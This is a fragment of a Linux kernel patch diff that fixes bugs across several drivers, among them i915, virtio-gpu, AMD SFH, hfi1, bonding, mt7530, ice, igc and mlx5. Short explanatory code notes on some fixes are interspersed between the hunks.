+@@ -3406,19 +3422,16 @@ bool intel_bios_is_dsi_present(struct drm_i915_private *i915,
+ 
+ 		dvo_port = child->dvo_port;
+ 
+-		if (dvo_port == DVO_PORT_MIPIA ||
+-		    (dvo_port == DVO_PORT_MIPIB && DISPLAY_VER(i915) >= 11) ||
+-		    (dvo_port == DVO_PORT_MIPIC && DISPLAY_VER(i915) < 11)) {
+-			if (port)
+-				*port = dvo_port - DVO_PORT_MIPIA;
+-			return true;
+-		} else if (dvo_port == DVO_PORT_MIPIB ||
+-			   dvo_port == DVO_PORT_MIPIC ||
+-			   dvo_port == DVO_PORT_MIPID) {
++		if (dsi_dvo_port_to_port(i915, dvo_port) == PORT_NONE) {
+ 			drm_dbg_kms(&i915->drm,
+ 				    "VBT has unsupported DSI port %c\n",
+ 				    port_name(dvo_port - DVO_PORT_MIPIA));
++			continue;
+ 		}
++
++		if (port)
++			*port = dsi_dvo_port_to_port(i915, dvo_port);
++		return true;
+ 	}
+ 
+ 	return false;
+@@ -3503,7 +3516,7 @@ bool intel_bios_get_dsc_params(struct intel_encoder *encoder,
+ 		if (!(child->device_type & DEVICE_TYPE_MIPI_OUTPUT))
+ 			continue;
+ 
+-		if (child->dvo_port - DVO_PORT_MIPIA == encoder->port) {
++		if (dsi_dvo_port_to_port(i915, child->dvo_port) == encoder->port) {
+ 			if (!devdata->dsc)
+ 				return false;
+ 
+diff --git a/drivers/gpu/drm/i915/display/skl_watermark.c b/drivers/gpu/drm/i915/display/skl_watermark.c
+index 18178b01375e4..a7adf02476f6a 100644
+--- a/drivers/gpu/drm/i915/display/skl_watermark.c
++++ b/drivers/gpu/drm/i915/display/skl_watermark.c
+@@ -1587,7 +1587,8 @@ skl_crtc_allocate_plane_ddb(struct intel_atomic_state *state,
+ 				skl_check_wm_level(&wm->wm[level], ddb);
+ 
+ 			if (icl_need_wm1_wa(i915, plane_id) &&
+-			    level == 1 && wm->wm[0].enable) {
++			    level == 1 && !wm->wm[level].enable &&
++			    wm->wm[0].enable) {
+ 				wm->wm[level].blocks = wm->wm[0].blocks;
+ 				wm->wm[level].lines = wm->wm[0].lines;
+ 				wm->wm[level].ignore_lines = wm->wm[0].ignore_lines;
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c b/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
+index f461e34cc5f07..0a123bb44c9fb 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
+@@ -3478,6 +3478,13 @@ err_request:
+ 				   eb.composite_fence :
+ 				   &eb.requests[0]->fence);
+ 
++	if (unlikely(eb.gem_context->syncobj)) {
++		drm_syncobj_replace_fence(eb.gem_context->syncobj,
++					  eb.composite_fence ?
++					  eb.composite_fence :
++					  &eb.requests[0]->fence);
++	}
++
+ 	if (out_fence) {
+ 		if (err == 0) {
+ 			fd_install(out_fence_fd, out_fence->file);
+@@ -3489,13 +3496,6 @@ err_request:
+ 		}
+ 	}
+ 
+-	if (unlikely(eb.gem_context->syncobj)) {
+-		drm_syncobj_replace_fence(eb.gem_context->syncobj,
+-					  eb.composite_fence ?
+-					  eb.composite_fence :
+-					  &eb.requests[0]->fence);
+-	}
+-
+ 	if (!out_fence && eb.composite_fence)
+ 		dma_fence_put(eb.composite_fence);
+ 
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_shmem.c b/drivers/gpu/drm/i915/gem/i915_gem_shmem.c
+index 2f7804492cd5c..b7eae3aee1660 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_shmem.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_shmem.c
+@@ -579,7 +579,7 @@ static int shmem_object_init(struct intel_memory_region *mem,
+ 	mapping_set_gfp_mask(mapping, mask);
+ 	GEM_BUG_ON(!(mapping_gfp_mask(mapping) & __GFP_RECLAIM));
+ 
+-	i915_gem_object_init(obj, &i915_gem_shmem_ops, &lock_class, 0);
++	i915_gem_object_init(obj, &i915_gem_shmem_ops, &lock_class, flags);
+ 	obj->mem_flags |= I915_BO_FLAG_STRUCT_PAGE;
+ 	obj->write_domain = I915_GEM_DOMAIN_CPU;
+ 	obj->read_domains = I915_GEM_DOMAIN_CPU;
+diff --git a/drivers/gpu/drm/virtio/virtgpu_ioctl.c b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+index 9f4a90493aeac..da45215a933d0 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_ioctl.c
++++ b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+@@ -126,7 +126,6 @@ static int virtio_gpu_execbuffer_ioctl(struct drm_device *dev, void *data,
+ 	void __user *user_bo_handles = NULL;
+ 	struct virtio_gpu_object_array *buflist = NULL;
+ 	struct sync_file *sync_file;
+-	int in_fence_fd = exbuf->fence_fd;
+ 	int out_fence_fd = -1;
+ 	void *buf;
+ 	uint64_t fence_ctx;
+@@ -152,13 +151,11 @@ static int virtio_gpu_execbuffer_ioctl(struct drm_device *dev, void *data,
+ 		ring_idx = exbuf->ring_idx;
+ 	}
+ 
+-	exbuf->fence_fd = -1;
+-
+ 	virtio_gpu_create_context(dev, file);
+ 	if (exbuf->flags & VIRTGPU_EXECBUF_FENCE_FD_IN) {
+ 		struct dma_fence *in_fence;
+ 
+-		in_fence = sync_file_get_fence(in_fence_fd);
++		in_fence = sync_file_get_fence(exbuf->fence_fd);
+ 
+ 		if (!in_fence)
+ 			return -EINVAL;
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_client.c b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+index 1fb0f7105fb21..c751d12f5df89 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_client.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+@@ -227,6 +227,7 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 	cl_data->num_hid_devices = amd_mp2_get_sensor_num(privdata, &cl_data->sensor_idx[0]);
+ 	if (cl_data->num_hid_devices == 0)
+ 		return -ENODEV;
++	cl_data->is_any_sensor_enabled = false;
+ 
+ 	INIT_DELAYED_WORK(&cl_data->work, amd_sfh_work);
+ 	INIT_DELAYED_WORK(&cl_data->work_buffer, amd_sfh_work_buffer);
+@@ -287,6 +288,7 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 		status = amd_sfh_wait_for_response
+ 				(privdata, cl_data->sensor_idx[i], SENSOR_ENABLED);
+ 		if (status == SENSOR_ENABLED) {
++			cl_data->is_any_sensor_enabled = true;
+ 			cl_data->sensor_sts[i] = SENSOR_ENABLED;
+ 			rc = amdtp_hid_probe(cl_data->cur_hid_dev, cl_data);
+ 			if (rc) {
+@@ -301,19 +303,26 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 					cl_data->sensor_sts[i]);
+ 				goto cleanup;
+ 			}
++		} else {
++			cl_data->sensor_sts[i] = SENSOR_DISABLED;
++			dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
++				cl_data->sensor_idx[i],
++				get_sensor_name(cl_data->sensor_idx[i]),
++				cl_data->sensor_sts[i]);
+ 		}
+ 		dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+ 			cl_data->sensor_idx[i], get_sensor_name(cl_data->sensor_idx[i]),
+ 			cl_data->sensor_sts[i]);
+ 	}
+-	if (mp2_ops->discovery_status && mp2_ops->discovery_status(privdata) == 0) {
++	if (!cl_data->is_any_sensor_enabled ||
++	   (mp2_ops->discovery_status && mp2_ops->discovery_status(privdata) == 0)) {
+ 		amd_sfh_hid_client_deinit(privdata);
+ 		for (i = 0; i < cl_data->num_hid_devices; i++) {
+ 			devm_kfree(dev, cl_data->feature_report[i]);
+ 			devm_kfree(dev, in_data->input_report[i]);
+ 			devm_kfree(dev, cl_data->report_descr[i]);
+ 		}
+-		dev_warn(dev, "Failed to discover, sensors not enabled\n");
++		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n", cl_data->is_any_sensor_enabled);
+ 		return -EOPNOTSUPP;
+ 	}
+ 	schedule_delayed_work(&cl_data->work_buffer, msecs_to_jiffies(AMD_SFH_IDLE_LOOP));
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_hid.h b/drivers/hid/amd-sfh-hid/amd_sfh_hid.h
+index 3754fb423e3ae..528036892c9d2 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_hid.h
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_hid.h
+@@ -32,6 +32,7 @@ struct amd_input_data {
+ struct amdtp_cl_data {
+ 	u8 init_done;
+ 	u32 cur_hid_dev;
++	bool is_any_sensor_enabled;
+ 	u32 hid_dev_count;
+ 	u32 num_hid_devices;
+ 	struct device_info *hid_devices;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 656757c79f6b8..07b8506eecc41 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -3978,7 +3978,8 @@ static void hidpp_connect_event(struct hidpp_device *hidpp)
+ 	}
+ 
+ 	hidpp_initialize_battery(hidpp);
+-	hidpp_initialize_hires_scroll(hidpp);
++	if (!hid_is_usb(hidpp->hid_dev))
++		hidpp_initialize_hires_scroll(hidpp);
+ 
+ 	/* forward current battery state */
+ 	if (hidpp->capabilities & HIDPP_CAPABILITY_HIDPP10_BATTERY) {
+diff --git a/drivers/infiniband/hw/hfi1/file_ops.c b/drivers/infiniband/hw/hfi1/file_ops.c
+index f5f9269fdc162..7c5d487ec9168 100644
+--- a/drivers/infiniband/hw/hfi1/file_ops.c
++++ b/drivers/infiniband/hw/hfi1/file_ops.c
+@@ -1318,12 +1318,15 @@ static int user_exp_rcv_setup(struct hfi1_filedata *fd, unsigned long arg,
+ 		addr = arg + offsetof(struct hfi1_tid_info, tidcnt);
+ 		if (copy_to_user((void __user *)addr, &tinfo.tidcnt,
+ 				 sizeof(tinfo.tidcnt)))
+-			return -EFAULT;
++			ret = -EFAULT;
+ 
+ 		addr = arg + offsetof(struct hfi1_tid_info, length);
+-		if (copy_to_user((void __user *)addr, &tinfo.length,
++		if (!ret && copy_to_user((void __user *)addr, &tinfo.length,
+ 				 sizeof(tinfo.length)))
+ 			ret = -EFAULT;
++
++		if (ret)
++			hfi1_user_exp_rcv_invalid(fd, &tinfo);
+ 	}
+ 
+ 	return ret;
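The shape of the fix, reduced (uinfo and the unwind helper are stand-ins): record the first -EFAULT instead of returning immediately, skip the second copy once a fault has been seen, and run the invalidation on any failure so the just-programmed TID entries are not leaked:

	int ret = 0;

	if (copy_to_user(&uinfo->tidcnt, &tinfo.tidcnt, sizeof(tinfo.tidcnt)))
		ret = -EFAULT;
	if (!ret && copy_to_user(&uinfo->length, &tinfo.length,
				 sizeof(tinfo.length)))
		ret = -EFAULT;
	if (ret)
		invalidate_entries(fd, &tinfo); /* stand-in for the unwind */
	return ret;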
+diff --git a/drivers/infiniband/hw/irdma/cm.c b/drivers/infiniband/hw/irdma/cm.c
+index 7b086fe63a245..195aa9ea18b6c 100644
+--- a/drivers/infiniband/hw/irdma/cm.c
++++ b/drivers/infiniband/hw/irdma/cm.c
+@@ -1722,6 +1722,9 @@ static int irdma_add_mqh_4(struct irdma_device *iwdev,
+ 			continue;
+ 
+ 		idev = in_dev_get(ip_dev);
++		if (!idev)
++			continue;
++
+ 		in_dev_for_each_ifa_rtnl(ifa, idev) {
+ 			ibdev_dbg(&iwdev->ibdev,
+ 				  "CM: Allocating child CM Listener forIP=%pI4, vlan_id=%d, MAC=%pM\n",
+diff --git a/drivers/infiniband/hw/usnic/usnic_uiom.c b/drivers/infiniband/hw/usnic/usnic_uiom.c
+index 67923ced6e2d1..b343f6f1bda57 100644
+--- a/drivers/infiniband/hw/usnic/usnic_uiom.c
++++ b/drivers/infiniband/hw/usnic/usnic_uiom.c
+@@ -277,8 +277,8 @@ iter_chunk:
+ 				size = pa_end - pa_start + PAGE_SIZE;
+ 				usnic_dbg("va 0x%lx pa %pa size 0x%zx flags 0x%x",
+ 					va_start, &pa_start, size, flags);
+-				err = iommu_map(pd->domain, va_start, pa_start,
+-							size, flags);
++				err = iommu_map_atomic(pd->domain, va_start,
++						       pa_start, size, flags);
+ 				if (err) {
+ 					usnic_err("Failed to map va 0x%lx pa %pa size 0x%zx with err %d\n",
+ 						va_start, &pa_start, size, err);
+@@ -294,8 +294,8 @@ iter_chunk:
+ 				size = pa - pa_start + PAGE_SIZE;
+ 				usnic_dbg("va 0x%lx pa %pa size 0x%zx flags 0x%x\n",
+ 					va_start, &pa_start, size, flags);
+-				err = iommu_map(pd->domain, va_start, pa_start,
+-						size, flags);
++				err = iommu_map_atomic(pd->domain, va_start,
++						       pa_start, size, flags);
+ 				if (err) {
+ 					usnic_err("Failed to map va 0x%lx pa %pa size 0x%zx with err %d\n",
+ 						va_start, &pa_start, size, err);
+diff --git a/drivers/infiniband/ulp/ipoib/ipoib_main.c b/drivers/infiniband/ulp/ipoib/ipoib_main.c
+index ac25fc80fb337..f10d4bcf87d27 100644
+--- a/drivers/infiniband/ulp/ipoib/ipoib_main.c
++++ b/drivers/infiniband/ulp/ipoib/ipoib_main.c
+@@ -2200,6 +2200,14 @@ int ipoib_intf_init(struct ib_device *hca, u32 port, const char *name,
+ 		rn->attach_mcast = ipoib_mcast_attach;
+ 		rn->detach_mcast = ipoib_mcast_detach;
+ 		rn->hca = hca;
++
++		rc = netif_set_real_num_tx_queues(dev, 1);
++		if (rc)
++			goto out;
++
++		rc = netif_set_real_num_rx_queues(dev, 1);
++		if (rc)
++			goto out;
+ 	}
+ 
+ 	priv->rn_ops = dev->netdev_ops;
+diff --git a/drivers/net/bonding/bond_debugfs.c b/drivers/net/bonding/bond_debugfs.c
+index 4f9b4a18c74cd..5940945266489 100644
+--- a/drivers/net/bonding/bond_debugfs.c
++++ b/drivers/net/bonding/bond_debugfs.c
+@@ -76,7 +76,7 @@ void bond_debug_reregister(struct bonding *bond)
+ 
+ 	d = debugfs_rename(bonding_debug_root, bond->debug_dir,
+ 			   bonding_debug_root, bond->dev->name);
+-	if (d) {
++	if (!IS_ERR(d)) {
+ 		bond->debug_dir = d;
+ 	} else {
+ 		netdev_warn(bond->dev, "failed to reregister, so just unregister old one\n");
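The rule underneath, sketched: debugfs_rename() reports failure through ERR_PTR() rather than NULL, so a plain truthiness test treats the error cookie as success and stores it. IS_ERR() and PTR_ERR() are the correct checks:

	struct dentry *d;

	d = debugfs_rename(root, old_dentry, root, new_name);
	if (IS_ERR(d))
		pr_warn("debugfs rename failed: %ld\n", PTR_ERR(d));
	else
		bond->debug_dir = d;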
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index e74c6b4061728..a884f6f6a8c2c 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -1309,14 +1309,26 @@ mt7530_port_set_vlan_aware(struct dsa_switch *ds, int port)
+ 		if (!priv->ports[port].pvid)
+ 			mt7530_rmw(priv, MT7530_PVC_P(port), ACC_FRM_MASK,
+ 				   MT7530_VLAN_ACC_TAGGED);
+-	}
+ 
+-	/* Set the port as a user port which is to be able to recognize VID
+-	 * from incoming packets before fetching entry within the VLAN table.
+-	 */
+-	mt7530_rmw(priv, MT7530_PVC_P(port), VLAN_ATTR_MASK | PVC_EG_TAG_MASK,
+-		   VLAN_ATTR(MT7530_VLAN_USER) |
+-		   PVC_EG_TAG(MT7530_VLAN_EG_DISABLED));
++		/* Set the port as a user port which is to be able to recognize
++		 * VID from incoming packets before fetching entry within the
++		 * VLAN table.
++		 */
++		mt7530_rmw(priv, MT7530_PVC_P(port),
++			   VLAN_ATTR_MASK | PVC_EG_TAG_MASK,
++			   VLAN_ATTR(MT7530_VLAN_USER) |
++			   PVC_EG_TAG(MT7530_VLAN_EG_DISABLED));
++	} else {
++		/* Also set CPU ports to the "user" VLAN port attribute, to
++		 * allow VLAN classification, but keep the EG_TAG attribute as
++		 * "consistent" (i.o.w. don't change its value) for packets
++		 * received by the switch from the CPU, so that tagged packets
++		 * are forwarded to user ports as tagged, and untagged as
++		 * untagged.
++		 */
++		mt7530_rmw(priv, MT7530_PVC_P(port), VLAN_ATTR_MASK,
++			   VLAN_ATTR(MT7530_VLAN_USER));
++	}
+ }
+ 
+ static void
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index 300f47ca42e3e..e255780f3867c 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -4614,25 +4614,26 @@ static int init_reset_optional(struct platform_device *pdev)
+ 		if (ret)
+ 			return dev_err_probe(&pdev->dev, ret,
+ 					     "failed to init SGMII PHY\n");
+-	}
+ 
+-	ret = zynqmp_pm_is_function_supported(PM_IOCTL, IOCTL_SET_GEM_CONFIG);
+-	if (!ret) {
+-		u32 pm_info[2];
++		ret = zynqmp_pm_is_function_supported(PM_IOCTL, IOCTL_SET_GEM_CONFIG);
++		if (!ret) {
++			u32 pm_info[2];
++
++			ret = of_property_read_u32_array(pdev->dev.of_node, "power-domains",
++							 pm_info, ARRAY_SIZE(pm_info));
++			if (ret) {
++				dev_err(&pdev->dev, "Failed to read power management information\n");
++				goto err_out_phy_exit;
++			}
++			ret = zynqmp_pm_set_gem_config(pm_info[1], GEM_CONFIG_FIXED, 0);
++			if (ret)
++				goto err_out_phy_exit;
+ 
+-		ret = of_property_read_u32_array(pdev->dev.of_node, "power-domains",
+-						 pm_info, ARRAY_SIZE(pm_info));
+-		if (ret) {
+-			dev_err(&pdev->dev, "Failed to read power management information\n");
+-			goto err_out_phy_exit;
++			ret = zynqmp_pm_set_gem_config(pm_info[1], GEM_CONFIG_SGMII_MODE, 1);
++			if (ret)
++				goto err_out_phy_exit;
+ 		}
+-		ret = zynqmp_pm_set_gem_config(pm_info[1], GEM_CONFIG_FIXED, 0);
+-		if (ret)
+-			goto err_out_phy_exit;
+ 
+-		ret = zynqmp_pm_set_gem_config(pm_info[1], GEM_CONFIG_SGMII_MODE, 1);
+-		if (ret)
+-			goto err_out_phy_exit;
+ 	}
+ 
+ 	/* Fully reset controller at hardware level if mapped in device tree */
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 1ac5f0018c7eb..333582dabba16 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -5518,7 +5518,7 @@ static int __init ice_module_init(void)
+ 	pr_info("%s\n", ice_driver_string);
+ 	pr_info("%s\n", ice_copyright);
+ 
+-	ice_wq = alloc_workqueue("%s", WQ_MEM_RECLAIM, 0, KBUILD_MODNAME);
++	ice_wq = alloc_workqueue("%s", 0, 0, KBUILD_MODNAME);
+ 	if (!ice_wq) {
+ 		pr_err("Failed to create workqueue\n");
+ 		return -ENOMEM;
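Background on the flag drop, hedged: WQ_MEM_RECLAIM reserves a rescuer thread so the queue can make forward progress during memory reclaim, and the workqueue core warns (via its flush-dependency check) when such a queue flushes work onto a queue without the flag. A queue that is not on the reclaim path is simpler without it:

	struct workqueue_struct *wq;

	wq = alloc_workqueue("%s", 0, 0, KBUILD_MODNAME); /* no WQ_MEM_RECLAIM */
	if (!wq)
		return -ENOMEM;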
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 9b762f7972ce5..61f844d225123 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -5420,7 +5420,7 @@ ice_add_adv_recipe(struct ice_hw *hw, struct ice_adv_lkup_elem *lkups,
+ 	 */
+ 	status = ice_add_special_words(rinfo, lkup_exts, ice_is_dvm_ena(hw));
+ 	if (status)
+-		goto err_free_lkup_exts;
++		goto err_unroll;
+ 
+ 	/* Group match words into recipes using preferred recipe grouping
+ 	 * criteria.
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_vsi_vlan_ops.c b/drivers/net/ethernet/intel/ice/ice_vf_vsi_vlan_ops.c
+index 5ecc0ee9a78e0..b1ffb81893d48 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_vsi_vlan_ops.c
++++ b/drivers/net/ethernet/intel/ice/ice_vf_vsi_vlan_ops.c
+@@ -44,13 +44,17 @@ void ice_vf_vsi_init_vlan_ops(struct ice_vsi *vsi)
+ 
+ 		/* outer VLAN ops regardless of port VLAN config */
+ 		vlan_ops->add_vlan = ice_vsi_add_vlan;
+-		vlan_ops->dis_rx_filtering = ice_vsi_dis_rx_vlan_filtering;
+ 		vlan_ops->ena_tx_filtering = ice_vsi_ena_tx_vlan_filtering;
+ 		vlan_ops->dis_tx_filtering = ice_vsi_dis_tx_vlan_filtering;
+ 
+ 		if (ice_vf_is_port_vlan_ena(vf)) {
+ 			/* setup outer VLAN ops */
+ 			vlan_ops->set_port_vlan = ice_vsi_set_outer_port_vlan;
++			/* all Rx traffic should be in the domain of the
++			 * assigned port VLAN, so prevent disabling Rx VLAN
++			 * filtering
++			 */
++			vlan_ops->dis_rx_filtering = noop_vlan;
+ 			vlan_ops->ena_rx_filtering =
+ 				ice_vsi_ena_rx_vlan_filtering;
+ 
+@@ -63,6 +67,9 @@ void ice_vf_vsi_init_vlan_ops(struct ice_vsi *vsi)
+ 			vlan_ops->ena_insertion = ice_vsi_ena_inner_insertion;
+ 			vlan_ops->dis_insertion = ice_vsi_dis_inner_insertion;
+ 		} else {
++			vlan_ops->dis_rx_filtering =
++				ice_vsi_dis_rx_vlan_filtering;
++
+ 			if (!test_bit(ICE_FLAG_VF_VLAN_PRUNING, pf->flags))
+ 				vlan_ops->ena_rx_filtering = noop_vlan;
+ 			else
+@@ -96,7 +103,14 @@ void ice_vf_vsi_init_vlan_ops(struct ice_vsi *vsi)
+ 			vlan_ops->set_port_vlan = ice_vsi_set_inner_port_vlan;
+ 			vlan_ops->ena_rx_filtering =
+ 				ice_vsi_ena_rx_vlan_filtering;
++			/* all Rx traffic should be in the domain of the
++			 * assigned port VLAN, so prevent disabling Rx VLAN
++			 * filtering
++			 */
++			vlan_ops->dis_rx_filtering = noop_vlan;
+ 		} else {
++			vlan_ops->dis_rx_filtering =
++				ice_vsi_dis_rx_vlan_filtering;
+ 			if (!test_bit(ICE_FLAG_VF_VLAN_PRUNING, pf->flags))
+ 				vlan_ops->ena_rx_filtering = noop_vlan;
+ 			else
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 34db1c006b20a..3b5b36206c44b 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -2942,7 +2942,9 @@ static bool igc_clean_tx_irq(struct igc_q_vector *q_vector, int napi_budget)
+ 		if (tx_buffer->next_to_watch &&
+ 		    time_after(jiffies, tx_buffer->time_stamp +
+ 		    (adapter->tx_timeout_factor * HZ)) &&
+-		    !(rd32(IGC_STATUS) & IGC_STATUS_TXOFF)) {
++		    !(rd32(IGC_STATUS) & IGC_STATUS_TXOFF) &&
++		    (rd32(IGC_TDH(tx_ring->reg_idx)) !=
++		     readl(tx_ring->tail))) {
+ 			/* detected Tx unit hang */
+ 			netdev_err(tx_ring->netdev,
+ 				   "Detected Tx Unit Hang\n"
+@@ -5068,6 +5070,24 @@ static int igc_change_mtu(struct net_device *netdev, int new_mtu)
+ 	return 0;
+ }
+ 
++/**
++ * igc_tx_timeout - Respond to a Tx Hang
++ * @netdev: network interface device structure
++ * @txqueue: queue number that timed out
++ **/
++static void igc_tx_timeout(struct net_device *netdev,
++			   unsigned int __always_unused txqueue)
++{
++	struct igc_adapter *adapter = netdev_priv(netdev);
++	struct igc_hw *hw = &adapter->hw;
++
++	/* Do the reset outside of interrupt context */
++	adapter->tx_timeout_count++;
++	schedule_work(&adapter->reset_task);
++	wr32(IGC_EICS,
++	     (adapter->eims_enable_mask & ~adapter->eims_other));
++}
++
+ /**
+  * igc_get_stats64 - Get System Network Statistics
+  * @netdev: network interface device structure
+@@ -5495,7 +5515,7 @@ static void igc_watchdog_task(struct work_struct *work)
+ 			case SPEED_100:
+ 			case SPEED_1000:
+ 			case SPEED_2500:
+-				adapter->tx_timeout_factor = 7;
++				adapter->tx_timeout_factor = 1;
+ 				break;
+ 			}
+ 
+@@ -6313,6 +6333,7 @@ static const struct net_device_ops igc_netdev_ops = {
+ 	.ndo_set_rx_mode	= igc_set_rx_mode,
+ 	.ndo_set_mac_address	= igc_set_mac,
+ 	.ndo_change_mtu		= igc_change_mtu,
++	.ndo_tx_timeout		= igc_tx_timeout,
+ 	.ndo_get_stats64	= igc_get_stats64,
+ 	.ndo_fix_features	= igc_fix_features,
+ 	.ndo_set_features	= igc_set_features,
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 9aa1892a609c7..53ee9dea66388 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -1495,8 +1495,8 @@ static struct page_pool *mtk_create_page_pool(struct mtk_eth *eth,
+ 	if (IS_ERR(pp))
+ 		return pp;
+ 
+-	err = __xdp_rxq_info_reg(xdp_q, &eth->dummy_dev, eth->rx_napi.napi_id,
+-				 id, PAGE_SIZE);
++	err = __xdp_rxq_info_reg(xdp_q, &eth->dummy_dev, id,
++				 eth->rx_napi.napi_id, PAGE_SIZE);
+ 	if (err < 0)
+ 		goto err_free_pp;
+ 
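For reference, the prototype the call must match (as declared in include/net/xdp.h around v6.1); the fix above swaps the third and fourth arguments, which had been passed in each other's positions:

int __xdp_rxq_info_reg(struct xdp_rxq_info *xdp_rxq,
		       struct net_device *dev, u32 queue_index,
		       unsigned int napi_id, u32 frag_size);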
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c b/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
+index 3e232a65a0c3e..bb95b40d25eb5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/debugfs.c
+@@ -245,8 +245,9 @@ void mlx5_pages_debugfs_init(struct mlx5_core_dev *dev)
+ 	pages = dev->priv.dbg.pages_debugfs;
+ 
+ 	debugfs_create_u32("fw_pages_total", 0400, pages, &dev->priv.fw_pages);
+-	debugfs_create_u32("fw_pages_vfs", 0400, pages, &dev->priv.vfs_pages);
+-	debugfs_create_u32("fw_pages_host_pf", 0400, pages, &dev->priv.host_pf_pages);
++	debugfs_create_u32("fw_pages_vfs", 0400, pages, &dev->priv.page_counters[MLX5_VF]);
++	debugfs_create_u32("fw_pages_sfs", 0400, pages, &dev->priv.page_counters[MLX5_SF]);
++	debugfs_create_u32("fw_pages_host_pf", 0400, pages, &dev->priv.page_counters[MLX5_HOST_PF]);
+ 	debugfs_create_u32("fw_pages_alloc_failed", 0400, pages, &dev->priv.fw_pages_alloc_failed);
+ 	debugfs_create_u32("fw_pages_give_dropped", 0400, pages, &dev->priv.give_pages_dropped);
+ 	debugfs_create_u32("fw_pages_reclaim_discard", 0400, pages,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index 21831386b26e8..5b05b884b5fb3 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -64,6 +64,7 @@ static int mlx5_query_mtrc_caps(struct mlx5_fw_tracer *tracer)
+ 			MLX5_GET(mtrc_cap, out, num_string_trace);
+ 	tracer->str_db.num_string_db = MLX5_GET(mtrc_cap, out, num_string_db);
+ 	tracer->owner = !!MLX5_GET(mtrc_cap, out, trace_owner);
++	tracer->str_db.loaded = false;
+ 
+ 	for (i = 0; i < tracer->str_db.num_string_db; i++) {
+ 		mtrc_cap_sp = MLX5_ADDR_OF(mtrc_cap, out, string_db_param[i]);
+@@ -756,6 +757,7 @@ static int mlx5_fw_tracer_set_mtrc_conf(struct mlx5_fw_tracer *tracer)
+ 	if (err)
+ 		mlx5_core_warn(dev, "FWTracer: Failed to set tracer configurations %d\n", err);
+ 
++	tracer->buff.consumer_index = 0;
+ 	return err;
+ }
+ 
+@@ -820,7 +822,6 @@ static void mlx5_fw_tracer_ownership_change(struct work_struct *work)
+ 	mlx5_core_dbg(tracer->dev, "FWTracer: ownership changed, current=(%d)\n", tracer->owner);
+ 	if (tracer->owner) {
+ 		tracer->owner = false;
+-		tracer->buff.consumer_index = 0;
+ 		return;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+index 464eb3a184506..cdc87ecae5d39 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ecpf.c
+@@ -87,7 +87,7 @@ void mlx5_ec_cleanup(struct mlx5_core_dev *dev)
+ 
+ 	mlx5_host_pf_cleanup(dev);
+ 
+-	err = mlx5_wait_for_pages(dev, &dev->priv.host_pf_pages);
++	err = mlx5_wait_for_pages(dev, &dev->priv.page_counters[MLX5_HOST_PF]);
+ 	if (err)
+ 		mlx5_core_warn(dev, "Timeout reclaiming external host PF pages err(%d)\n", err);
+ }
